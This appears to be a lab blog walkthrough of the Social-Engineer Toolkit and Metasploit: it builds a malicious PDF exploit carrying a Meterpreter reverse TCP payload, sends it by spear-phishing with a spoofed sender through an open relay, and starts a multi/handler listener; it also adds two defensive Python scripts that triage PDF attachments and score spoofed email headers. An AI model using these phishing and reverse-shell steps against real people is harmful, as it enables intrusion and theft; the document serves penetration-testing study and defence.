The Social-Engineer Toolkit (SET) and Metasploit: Spear-Phishing Attack Vectors


This post follows the instructions given in chapter ten (The Social-Engineer Toolkit) of Metasploit: The Penetration Tester’s Guide. Previous post here.

Here’s what we’re greeted with in the terminal on starting The Social-Engineer Toolkit (SET):

Select from the menu:

1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

We’ll select option one and are shown the following:

Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules

99) Return back to the main menu.

And select one again.

The Spearphishing module allows you to specially craft email messages and send them to a large (or small) number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure “Sendmail” is installed (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template

99) Return to Main Menu

We’ll select one again:

Select the file format exploit you want.
The default is the PDF embedded EXE.

********** PAYLOADS **********

1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
5) Adobe Flash Player “Button” Remote Code Execution
6) Adobe CoolType SING Table “uniqueName” Overflow
7) Adobe Flash Player “newfunction” Invalid Pointer Use
8) Adobe Collab.collectEmailInfo Buffer Overflow
9) Adobe Collab.getIcon Buffer Overflow
10) Adobe JBIG2Decode Memory Corruption Exploit
11) Adobe PDF Embedded EXE Social Engineering
12) Adobe util.printf() Buffer Overflow
13) Custom EXE to VBA (sent via RAR) (RAR required)
14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
15) Adobe PDF Embedded EXE Social Engineering (NOJS)
16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
17) Apple QuickTime PICT PnSize Buffer Overflow
18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
19) Adobe Reader u3D Memory Corruption Vulnerability
20) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

We’ll select option eight, which is a heap-based exploit. We are then asked which payload to deliver with it:

1) Windows Reverse TCP Shell - Spawn a command shell on victim and send back to attacker
2) Windows Meterpreter Reverse_TCP - Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse VNC DLL - Spawn a VNC server on victim and send back to attacker
4) Windows Reverse TCP Shell (x64) - Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP (X64) - Connect back to the attacker (Windows x64), Meterpreter
6) Windows Shell Bind_TCP (X64) - Execute payload and create an accepting port on remote system
7) Windows Meterpreter Reverse HTTPS - Tunnel communication over HTTP using SSL and use Meterpreter

And now option two:

set:payloads>2
set> IP address for the payload listener: 192.168.1.70 <– Enter attacking IP address
set:payloads> Port to connect back on [443]: <– Enter attacking listening port
[-] Defaulting to port 443…
[-] Generating fileformat exploit…
[*] Payload creation complete.
[*] All payloads get sent to the /root/.set/template.pdf directory
[-] As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of ‘template.whatever’

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don’t care.
2. Rename the file, I want to be cool.

We’ll keep the default filename by entering option one.

Keeping the filename and moving on.
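The attachment SET produces here is a file-format exploit in a PDF wrapper (the payload list above is dominated by Adobe Reader bugs, embedded executables and JavaScript-triggered overflows). On the receiving side, a mail gateway or an analyst can triage such an attachment before anyone opens it. The following is an added example for that defensive check, written for this post and not taken from SET, Metasploit or the book: it scans the raw bytes of a PDF for auto-run triggers (/OpenAction, /AA) and active content (/JavaScript, /JS, /Launch, /EmbeddedFile, /RichMedia, /XFA), resolves #xx hex escapes that are commonly used to hide those names, and flags a file whose .pdf extension does not match its magic bytes. The two sample PDFs are constructed inline and are not SET output.

```python
import re

# Name objects that warrant attention in a mail attachment. Active content
# alone is "medium"; active content wired to an auto-run trigger is "high".
ACTIVE_CONTENT = ("/JavaScript", "/JS", "/Launch", "/EmbeddedFile", "/RichMedia", "/XFA")
AUTO_TRIGGERS = ("/OpenAction", "/AA")


def normalize_names(data: bytes) -> bytes:
    """Resolve #xx hex escapes in PDF names so /J#61vaScript reads as /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def count_names(data: bytes) -> dict:
    """Count each risky name, ignoring longer names that merely share the prefix."""
    normalized = normalize_names(data)
    counts = {}
    for name in ACTIVE_CONTENT + AUTO_TRIGGERS:
        pattern = re.escape(name.encode()) + rb"(?![A-Za-z0-9])"
        hits = len(re.findall(pattern, normalized))
        if hits:
            counts[name] = hits
    return counts


def triage_attachment(filename: str, data: bytes) -> dict:
    """Classify an attachment that claims (by extension) to be a PDF.

    This is a raw-byte heuristic: compressed object streams are not inflated,
    so a clean result means "nothing visible", not "safe".
    """
    is_pdf = data.startswith(b"%PDF-")
    result = {"filename": filename, "is_pdf": is_pdf, "names": {}, "verdict": "low"}
    if filename.lower().endswith(".pdf") and not is_pdf:
        # Extension promises a PDF but the bytes are something else (e.g. a PE file).
        result["verdict"] = "extension-mismatch"
        return result
    if not is_pdf:
        result["verdict"] = "not-a-pdf"
        return result
    names = count_names(data)
    result["names"] = names
    active = any(n in names for n in ACTIVE_CONTENT)
    auto = any(n in names for n in AUTO_TRIGGERS)
    if active and auto:
        result["verdict"] = "high"      # script or launch action fires on open
    elif active or auto:
        result["verdict"] = "medium"
    return result


# Constructed samples (not real SET output): one auto-runs JavaScript via an
# obfuscated /JavaScript name, the other is an inert document skeleton.
SUSPICIOUS_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"3 0 obj << /Type /Action /S /J#61vaScript /JS (script body omitted) >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)
BENIGN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    for fname, blob in (("template.pdf", SUSPICIOUS_PDF), ("report.pdf", BENIGN_PDF),
                        ("template.pdf", b"MZ\x90\x00\x03")):
        print(triage_attachment(fname, blob))
```

Run it as a script to see the three verdicts, or import `triage_attachment` from a mail-filter hook. Because the scan works on raw bytes, a production version would first inflate /FlateDecode streams and walk object streams; the hex-escape normalisation is what catches the most common trick of hiding /JavaScript from naive string matching.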

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer

99. Return to main menu.

We’ll select one:

Do you want to use a predefined template or craft
a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

And select one again:

Available templates:
1: Baby Pics
2: Order Confirmation
3: Status Report
4: How long has it been?
5: Dan Brown’s Angels & Demons
6: New Update
7: Computer Issue
8: Strange internet usage from your computer
9: WOAAAA!!!!!!!!!! This is crazy…
10: Have you seen this?

We’ll go for option three:

Send email to: Enter target email address

I’m going to send this to one of my web based email accounts:

1. Use a gmail Account for your email attack.
2. Use your own server or open relay

I originally selected option one, but Gmail (and all my other web-based email accounts) kept refusing the connection, as the email had a potentially dangerous attachment, and so I was forced to use option two with my server-based email address.

set:phishing>2
set:phishing> From address (ex: moo@example.com):My email address
set:phishing> The FROM NAME user will see: :Make up a name
set:phishing> Username for open-relay [blank]:My server based email address
Password for open-relay [blank]: Password for server email
set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com): Email server address
set:phishing> Port number for the SMTP server [25]: Outgoing server email port number
set:phishing> Flag this message/s as high priority? [yes|no]:y
[*] SET has finished delivering the emails

At this point I checked my “target” email account, and an email had duly arrived entitled “Status Report”, with a PDF attachment simply named “Template”.

Interestingly, I tried to reply to the “sender” but the email address was not available, which is rather handy for stealth.
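The reason the reply bounced is that SET let the sender choose an arbitrary From address while the message actually left through a different account on an open relay, so the From header and the envelope sender (Return-Path) point at different domains. That mismatch, together with the failed SPF/DMARC results a receiving mail server records in Authentication-Results, the high-priority flag SET sets, and the PDF attachment, is exactly what a mail filter can score on. The following is an added example of that header analysis, written for this post and not part of SET, Metasploit or the book; the message below is constructed to resemble what the walkthrough describes arriving, and every domain and address in it is a placeholder.

```python
import re
from email import message_from_bytes, policy
from email.utils import parseaddr

# Constructed sample message (placeholder domains, not real infrastructure):
# spoofed From, envelope sender on a different host, failed SPF/DMARC,
# high priority, one PDF attachment whose body is just the %PDF-1.4 header.
SAMPLE_EML = b"""Return-Path: <relay-user@mailhost.example.net>
Authentication-Results: mx.example.org; spf=fail smtp.mailfrom=mailhost.example.net; dkim=none; dmarc=fail header.from=corp.example.com
From: "IT Helpdesk" <helpdesk@corp.example.com>
To: victim@example.org
Subject: Status Report
X-Priority: 1
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please review the attached status report.
--b1
Content-Type: application/pdf; name="template.pdf"
Content-Disposition: attachment; filename="template.pdf"
Content-Transfer-Encoding: base64

JVBERi0xLjQK
--b1--
"""


def domain_of(header_value) -> str:
    """Return the lower-cased domain of the first address in a header (or '')."""
    addr = parseaddr(str(header_value or ""))[1]
    return addr.rpartition("@")[2].lower()


def parse_auth_results(value: str) -> dict:
    """Pull the spf/dkim/dmarc verdicts out of an Authentication-Results header."""
    results = {}
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=([A-Za-z]+)", value)
        results[mech] = m.group(1).lower() if m else "none"
    return results


def analyze_message(raw: bytes) -> dict:
    """Score a raw RFC 5322 message on the spoofing indicators discussed above."""
    msg = message_from_bytes(raw, policy=policy.default)
    from_domain = domain_of(msg["From"])
    return_path_domain = domain_of(msg["Return-Path"])
    auth = parse_auth_results(str(msg["Authentication-Results"] or ""))

    attachments = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        payload = part.get_content()  # decoded bytes for non-text parts
        attachments.append({
            "filename": name,
            "content_type": part.get_content_type(),
            # A .pdf that does not start with %PDF- is lying about its type.
            "magic_matches_extension": (not name.lower().endswith(".pdf"))
                                       or payload.startswith(b"%PDF-"),
        })

    indicators = []
    if from_domain != return_path_domain:
        indicators.append("from/return-path domain mismatch")
    if auth["spf"] == "fail" or auth["dmarc"] == "fail":
        indicators.append("sender authentication failed")
    if str(msg.get("X-Priority", "")).strip() == "1":
        indicators.append("flagged high priority")
    if any(a["filename"].lower().endswith(".pdf") for a in attachments):
        indicators.append("pdf attachment")

    score = len(indicators)
    verdict = "quarantine" if score >= 3 else ("review" if score else "deliver")
    return {
        "from_domain": from_domain,
        "return_path_domain": return_path_domain,
        "auth": auth,
        "attachments": attachments,
        "indicators": indicators,
        "verdict": verdict,
    }


if __name__ == "__main__":
    print(analyze_message(SAMPLE_EML))
```

The thresholds (three indicators for quarantine) are an assumption chosen for the example; in practice the authentication failure alone is usually enough to quarantine when the From domain publishes a DMARC reject policy, and the header/envelope mismatch is what makes a "reply to sender" bounce as the post observed.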

I opened the PDF attachment out of curiosity and it appeared blank, but it must somehow set off the buffer overflow and in the process connect to the attacking machine.

Meanwhile, in the terminal I was asked:

set:phishing> Setup a listener [yes|no]:y

Which consequently activated Metasploit:

[*] Processing /root/.set/meta_config for ERB directives.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.1.70
LHOST => 192.168.1.70
resource (/root/.set/meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.1.70:443
[*] Starting the payload handler…

It would have been rather satisfying to see this exploit complete, but that’s as far as I can go for the moment.
